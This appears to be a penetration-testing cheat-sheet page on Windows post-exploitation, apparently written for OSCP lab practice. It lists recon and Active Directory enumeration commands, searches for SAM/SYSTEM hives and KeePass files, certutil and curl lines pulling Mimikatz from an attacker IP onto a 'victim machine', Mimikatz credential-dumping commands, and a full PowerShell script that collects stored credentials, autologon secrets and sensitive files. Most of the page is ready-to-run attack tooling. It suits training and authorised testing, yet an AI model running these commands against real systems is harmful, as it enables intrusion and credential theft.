Windows

Online Resource

Points of Interest

To note: In an event the following commands do not work, attempt to:

1. Run - PATH=%PATH%;c:\windows\system32
    Alternate PATH - PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0;C:\windows\System32\OpenSSH;C:\Program Files\dotnet\

2. Use the binary directly from C:\Windows\System32\

User Permissions

whoami
whoami /all
 whoami /user
 whoami /priv
 whoami /groups

net user

wmic <user>
dir env:
Get-LocalUser

Local accounts

net user
net user <username> /domain
    # Check if account is active in domain
net localgroup administrators
net share
net computer <computer name>
net accounts # Get password requirements

System Information

Key information -
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

Network information - 
    netstat -ano
    ipconfig
    
Current Console
    (dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Installed programs

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Interesting Files

where /r C:\Users\ *.txt
  -> where /r C:\ local.txt
  -> where /r C:\ proof.txt
where /r C:\ *.uac
where /r C:\ *.dll

dir C:\

To find specific files - 
 Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
	
 Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
	
 Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
	
 Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue

Web Root Directory

dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<>\xampp\htdocs

Indication of Web directory root
    > .htaccess, public_html, www, htdocs, httpdocs

Information Goldmine

Get-History
(Get-PSReadlineOption).HistorySavePath

Binary Analysis

powershell -ep bypass

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service name>'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
    # Avoid running Get-CimInstance on non-interactive shells
    
    certutil.exe -urlcache -split -f http://<Kali IP>/Watch-Command.ps1 Watch-Command.ps1 
    Import-Module .\Watch-Command.ps1 
    Get-Process <process name> -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30 

icacls <binary full path>

PowerView

powershell -ep bypass
Import-Module .\PowerView.ps1

Commands:
 Get-NetDomain OR Get-Domain

 Get-NetUser
 Get-NetUser -SPN | select samaccountname, serviceprincipalname
 Get-NetUser (User CN name)
  To filter the result, pipe the output in to a select statement
  Example: Get-NetUser | select cn, name, pwdlastset, lastlogon

 Get-NetGroup
 Get-NetGroup <Group name>
  To filter the result, pipe the output in to a select statement
  Example: Get-NetGroup | select cn, member
  
 Get-NetComputer
 Get-NetComputer <Computer name>
  To filter the result, pipe the output in to a select statement
  Example: Get-NetComputer | select cn, operatingsystem, dnshostname

 Find-LocalAdminAccess

 Get-NetSession -ComputerName <Computer name> -Verbose - Used to find logged on users on target computer
  Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)

 Get-NetComputer | Select-Object Name, @{Name='IPAddress';Expression={(Resolve-DnsName $_.Name).IPAddress}} 

 Get-Acl <Registry hive>:<Registry Key path> | fl
 Get-ObjectAcl -Identity <user name | group name>
  - Look for ActiveDirectoryRights, and SecurityIdentifier

 Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

 Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier,ActiveDirectoryRights

 Convert-SIDToName <SID>
 OR
 "<SID>", "<SID>", "<SID>" | Convert-SIDToName

Get-NetGPO
Get-GPPermission -Name "<GPO displayname>" -All

Automated Enumeration

WinPeas

On the Attacker
    /usr/share/peass/winpeas/winPEASx64.exe
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe
    
    /usr/share/peass/winpeas/winPEASx86.exe
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx86.exe

Transfer the respective executable onto compromised system
Run the executable and enumerate the output

Mimikatz

On Kali machine:
    wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe

On Victim machine:
    certutil -urlcache -split -f http://192.168.45.165/mimikatz.exe mimikatz.exe
    curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
    
 To Run:
    mimikatz.exe
    
    privilege::debug
    sekurlsa::logonpasswords # Find user NTLM hash
    lsadump::lsa /patch # Find krbtgt NTLM hash
 
 OR   
          
 Pass Mimikatz commands as arguments to the executable file 
    .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Automated Enum PowerShell Script

param($extended)
$lines
 
$lines="------------------------------------------"
function whost($a) {

    Write-Host -ForegroundColor Yellow $lines
    Write-Host -ForegroundColor Yellow " "$a 
    Write-Host -ForegroundColor Yellow $lines
}


whost "
 ******************************************************************
 ******************************************************************
 **                        OSCP Script usage                     **
 **                    Windows Enumeration Script (WSC)          **
 **                    Written by: infosecsanyam                 **    
 **                    Support by absolomb                       **
 ******************************************************************
 ******************************************************************"

$Access = Get-Date
Write-Output "[***] You ran this script on $Access [***]"

# Determine OS running on target
$ComputerName = $env:computername
$OS = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName | select caption | select-string windows)-split("=", "}", "{")[0] -replace "}"| select-string windows
If ($OS -match "10") {Write-Output "[*] You are running $OS"}

$standard_commands = [ordered]@{
    'Basic System Information Results'                    = 'Start-Process "systeminfo" -NoNewWindow -Wait | ft';
    'Environment Variables Results'                       = 'Get-ChildItem Env: | ft Key,Value';
    'Network Information Results'                         = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
    'DNS Servers Results'                                 = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
    'ARP cache Results'                                   = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
    'Routing Table Results'                               = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
    'Network Connections Results'                         = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
    'Connected Drives Results'                            = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
    'Firewall Config Results'                             = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
    'Credential Manager Results'                          = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
    'User Autologon Registry Items Results'               = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
    'Local Groups Results'                                = 'Get-LocalGroup | ft Name';
    'Local Administrators Results'                        = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
    'User Directories Results'                            = 'Get-ChildItem C:\Users | ft Name';
    'Searching for SAM backup files Results'              = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
    'Installed Software Directories Results'              = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
    'Software in Registry Results'                        = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
    'Folders with Everyone Permissions Results'           = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
    'Folders with BUILTIN\User Permissions Results'       = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
    'Checking registry for AlwaysInstallElevated Results' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
    'Unquoted Service Paths Results'                      = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
    'Scheduled Tasks Results'                             = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
    'Tasks Folder Results'                                = 'Get-ChildItem C:\Windows\Tasks | ft';
    'Startup Commands Results'                            = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
    'Host File content Results'                           = 'Get-content $env:windir\System32\drivers\etc\hosts | out-string';
    'Running Services Results'                            = 'Get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096'
    'Installed Softwares in Computer Results'             = 'Get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096'
    'Installed Patches Results'                           = 'Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string'
    'Recent Documents Used Results'                       = 'get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent"  -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string'
    'Potentially Interseting files Results'               = 'get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string | ft'
    'Last 10 Modified items Results'                      = 'Get-ChildItem "C:\Users" -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} |  %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string'
    'Stored Credentials Results'                          = 'cmdkey /list | out-string'
    'Localgroup Administrators Results'                   = 'net localgroup Administrators'
    'Current User Results'                                = 'Write-Host $env:UserDomain\$env:UserName';
    'User Privileges Results'                             = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
    'Local Users Results'                                 = 'Get-LocalUser | ft Name,Enabled,LastLogon';
    'Logged in Users Results'                             = 'gcim Win32_LoggedOnUser  | ft';
    'Running Processes Results'                           = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
}


function RunCommands($commands) {
    ForEach ($command in $commands.GetEnumerator()) {
        whost $command.Name
        Invoke-Expression $command.Value
    }
}

RunCommands($standard_commands)
    whost "Script finished!"

Read-Host -Prompt "Press Enter to exit"

PreviousLinux NextLinux

Last updated 4 months ago